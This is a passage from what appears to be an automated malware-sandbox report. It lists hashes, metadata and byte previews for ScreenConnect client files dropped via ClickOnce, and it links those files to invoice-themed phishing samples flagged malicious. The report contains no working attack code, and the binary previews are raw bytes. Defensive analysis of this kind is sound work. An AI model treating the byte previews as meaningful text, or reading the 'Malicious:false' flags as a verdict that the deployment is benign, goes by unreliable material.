                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2569
                                                                                                                        Entropy (8bit):5.027116382154264
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
                                                                                                                        MD5:6A1C3FF3E8F5E23698453B4CCDA2FD12
                                                                                                                        SHA1:C7EED4383B7F1982222E663A0B8850D09B6B20EF
                                                                                                                        SHA-256:8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
                                                                                                                        SHA-512:C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3032
                                                                                                                        Entropy (8bit):4.731228193192962
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:/qQ/c1gome6S+9oww7gV7ztoVXeSnxW6xe1YeCY+1Bnwb8:/l/cceV+WwwSztoV7xhxwYeCY+rnE8
                                                                                                                        MD5:CE5B5B15099F5A3876508FD46B1B259E
                                                                                                                        SHA1:9E1EC4672E15931635716CBF2857A4E82356E0D5
                                                                                                                        SHA-256:780DB11631CC36CFCB3800C0D0136A3D113D29E201B336042155AB534290AF40
                                                                                                                        SHA-512:EF06784268D9CD1FEA0C104ADAA6F364045DA7A81160133571DB3044BDC6F7ED076D0D8EE0B7AEC94441D8E0BD6794C3188D221815F8649848D9B63954FF2E48
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH..........%..r@.............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$............?..]k.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............<...........MdSp ...$....... ...".............n: urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1039
                                                                                                                        Entropy (8bit):5.151589954158412
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
                                                                                                                        MD5:618DC5F6C85A2057BC7A86C5F498E2F1
                                                                                                                        SHA1:5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
                                                                                                                        SHA-256:F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
                                                                                                                        SHA-512:A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14608
                                                                                                                        Entropy (8bit):5.715926122579569
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:CMtI9rf6h9o8s8owwSzN8s8oTN2x2QPIlFDLhEDh7BqWojO7:CM29rf6QX9mxX9R/QPIBM7Yjs
                                                                                                                        MD5:FD771B6C5C7BB132CD94745D81FC7535
                                                                                                                        SHA1:EC47E268D7192387073D12FA6F857447F6E9B9A2
                                                                                                                        SHA-256:A86CC47BEF95CA40FC1235C38A73834997DD41594018242F3F5BB17BC64D832F
                                                                                                                        SHA-512:27F4AC072DE4C6D640CD27F23561344E7428676D50924E497963085D6CBB1D2193C185311BA21D2CC346E3C34295167F9BDDC05ABC7F7FEA145B3B6D9AD7F05C
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH........1?..:J..$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$............?..]k..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%.q..T#..=W...K...Oi..?.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.3.7.9067%........................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):117161
                                                                                                                        Entropy (8bit):5.583971122293747
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
                                                                                                                        MD5:FE06C5E9C53AB451368667D3E3B1504B
                                                                                                                        SHA1:7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
                                                                                                                        SHA-256:89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
                                                                                                                        SHA-512:B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4428
                                                                                                                        Entropy (8bit):4.105005840603432
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:la3CDVxQ1goXe6S+9ow87gWW75uvsdOxV4wOB8f1fT55sFTnw9GUjdLf:la3TeV+Ww8x45u4OYwOB8FT5En6GyVf
                                                                                                                        MD5:7098E1705B924A734A951D952233BC4D
                                                                                                                        SHA1:E55BC5E608EB2C8874456EC7FF5E15A049616185
                                                                                                                        SHA-256:92D0E053F7813DB0CB2095C619E4625F98AF1753798EA1E2F99DF73D1EFE7F91
                                                                                                                        SHA-512:707E3978E37409695C4C37A17333C64851518C0445F8C1D153865BC4AE6D7CBAA30AE796D6A50B8C640B8878157362693A393815835627B90F6D65B020AB7BAD
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH.........2....z,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$............?..]k........6...................z..w.....[~31.X......E..X.....s".I...R....y..&..d......B(.........O.&r..Vz!...[s.T..<$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...8.......`.......h...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1632
                                                                                                                        Entropy (8bit):5.089918322084496
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
                                                                                                                        MD5:4E77158D54337B51A6368D7D094397C4
                                                                                                                        SHA1:3A029B30B95786ADF97FB3C0B1C37B11154E0344
                                                                                                                        SHA-256:276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
                                                                                                                        SHA-512:69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):95512
                                                                                                                        Entropy (8bit):6.504684691533346
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                        MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: Rechnung_10401.js, Detection: malicious, Browse
                                                                                                                        • Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse
                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61208
                                                                                                                        Entropy (8bit):6.310126082367387
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: Rechnung_10401.js, Detection: malicious, Browse
                                                                                                                        • Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse
                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):81688
                                                                                                                        Entropy (8bit):5.8618809599146005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                                        MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                                        SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                                        SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                                        SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.034211651049746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                        MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                        SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                        SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                        SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1721856
                                                                                                                        Entropy (8bit):6.639085961200334
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):602392
                                                                                                                        Entropy (8bit):6.176232491934078
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):197120
                                                                                                                        Entropy (8bit):6.586775768189165
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
